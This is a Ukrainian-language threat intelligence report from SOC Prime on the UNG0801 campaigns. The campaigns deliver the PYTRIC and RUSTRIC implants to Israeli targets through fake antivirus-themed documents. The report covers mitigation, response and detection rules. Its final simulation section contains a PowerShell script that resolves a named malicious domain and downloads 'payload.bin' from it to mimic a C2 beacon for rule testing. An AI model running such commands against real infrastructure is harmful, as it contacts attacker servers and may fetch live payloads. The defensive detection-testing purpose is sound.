SOC Prime Bias: Критичний

30 Dec 2025 13:40 UTC

UNG0801: Загроза для Ізраїлю через підробку іконок AV

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
UNG0801: Загроза для Ізраїлю через підробку іконок AV
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Звіт описує дві пов’язані кампанії, які використовують шкідливі PDF та Word документи для доставки завантажувальних файлів, що імітують іконки антивірусів та націлені на ізраїльські організації. Один трек доставляє PYTRIC, упаковану в PyInstaller Python закладку, тоді як інший доставляє RUSTRIC, закладку на базі Rust, що запускається через документ Word з макросом. Обидва завантажувальні файли збирають деталі хоста, виконують системні команди та перевіряють встановлене програмне забезпечення безпеки; PYTRIC додатково включає руйнівні функції. Доставка здійснюється через фішингові додатки та посилання в хмарі (включаючи Dropbox), з використанням Telegram для командування та контролю.

Розслідування

Лабораторії SEQRITE проаналізували початкові фішингові приманки, витягнули вбудовані макроси та відновили ланцюг завантаженого файлу. PYTRIC був підтверджений як пакет PyInstaller з процедурами виявлення файлів та їх видалення, аналітики спостерігали облікові дані бота Telegram, пов’язані з Backup2040. RUSTRIC був профільований як двійковий файл Rust, що перевіряє двадцять вісім продуктів антивірусного захисту та запускає шістнадцяткове закодований завантажувальний файл через WMI. Аналіз інфраструктури пов’язав доставлення з посиланням на Dropbox та доменом, що розв’язується на IP-адресу, на яку раніше було зорієнтовано netvigil.org.

Пом’якшення

Навчіть користувачів обережно ставитися до небажаних вкладених файлів PDF та Word, особливо до файлів, представлених як інструменти безпеки або утиліти, пов’язані з антивірусом. Налаштуйте безпеку електронної пошти на блокування документів із макросами та на встановлення прапорів або обмеження URL-адрес, що посилаються на хостінг у хмарі, використаний для доставки завантажувальних файлів. На кінцевих точках моніторте виконання PyInstaller, створення незвичайних процесів WMI і підозріле викликання вбудованих утиліт, таких як whoami, hostname та nslookup. Блокування виявлених зловмисних доменів та IP-адрес може додатково зірвати шлях зараження.

Відповідь

Якщо діяльність виявлена, ізолюйте уражену систему, збережіть змінну інформацію і зберіть шкідливі документи для хеш-тріажу. Зупиніть підозрілі процеси, що викликані WMI, і видаліть завантажувальні файли з загальнозавантажувальних локацій, таких як папка Завантаження. Виконайте судовий аналіз для перевірки видалення файлів або активності їх очищення, скиньте потенційно розкриті облікові дані та моніторте подальші комунікації Telegram C2.

Потік атаки

Детекції

Можливе зловживання Telegram як каналу командування і контролю (через dns_query)

Команда SOC Prime
29 грудня 2025

Можлива інфільтрація/експільтрація даних/С2 через сторонні сервіси/інструменти (через dns)

Команда SOC Prime
29 грудня 2025

Можливе системне перелічення (через cmdline)

Команда SOC Prime
29 грудня 2025

IOC (SourceIP) для виявлення: UNG0801: Відстеження кластерів загроз, одержимих підробкою іконок AV, націлених на Ізраїль

Правила AI SOC Prime
29 грудня 2025

IOC (DestinationIP) для виявлення: UNG0801: Відстеження кластерів загроз, одержимих підробкою іконок AV, націлених на Ізраїль

Правила AI SOC Prime
29 грудня 2025

IOC (HashSha256) для виявлення: UNG0801: Відстеження кластерів загроз, одержимих підробкою іконок AV, націлених на Ізраїль

Правила AI SOC Prime
29 грудня 2025

C2 комунікація із використанням певного домену та IP [З’єднання в мережі Windows]

Правила AI SOC Prime
29 грудня 2025

Виявлення шкідливого PDF та виконання навантаження в операції IconCat [Cтворення процесу Windows]

Правила AI SOC Prime
29 грудня 2025

Виконання симуляції

Передумова: Телеметрія та перевірка базового рівня повинні були пройти.

Обґрунтування: Цей розділ деталізує точне виконання техніки противника (TTP), розробленої для запуску правила детекції. Команди та оповідання ПОВИННІ безпосередньо відображати виявлені TTP та націлені на генерацію точної телеметрії, очікуваної логікою виявлення. Абстрактні або не пов’язані приклади призведуть до діагнозу.

  • Опис атаки та команди:
    Противник заздалегідь зареєстрував домен stratioai.org та налаштував його для розв’язування на 159.198.68.25 (компрометований VPS). Використовуючи однорядковий сценарій PowerShell, вони ініціюють маяк C2, що завантажує невелике навантаження, а потім підтримує стійку зворотну оболонку. Вихідне з’єднання здійснюється через HTTPS (порт 443), щоб зливатись із звичайним трафіком, але міжмережевий екран реєструє IP-адресу призначення та DNS-запит, що відповідає правилу sigma.

  • Скрипт регресійного тесту:

    # -------------------------------------------------
    # Симульований маяк C2 для перевірки виявлення
    # -------------------------------------------------
    # 1. Розв'язати шкідливий домен (викликає DNS-запит)
    $maliciousDomain = "stratioai.org"
    $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
    Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')"
    
    # 2. Встановити HTTPS-з'єднання з шкідливою IP (C2)
    $maliciousIP = "159.198.68.25"
    $url = "https://$maliciousDomain/payload.bin"
    
    try {
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes"
    } catch {
        Write-Error "C2 request failed: $_"
    }
    
    # 3. OPTIONAL: Залишити канал живим на 30 секунд
    Start-Sleep -Seconds 30
    # -------------------------------------------------
  • Команди очищення:

    # Видалити всі тимчасові файли (в цьому скрипті не створено)
    # Очистити кеш DNS, щоб уникнути випадкового повторного використання
    ipconfig /flushdns
    Write-Host "Очистка завершена."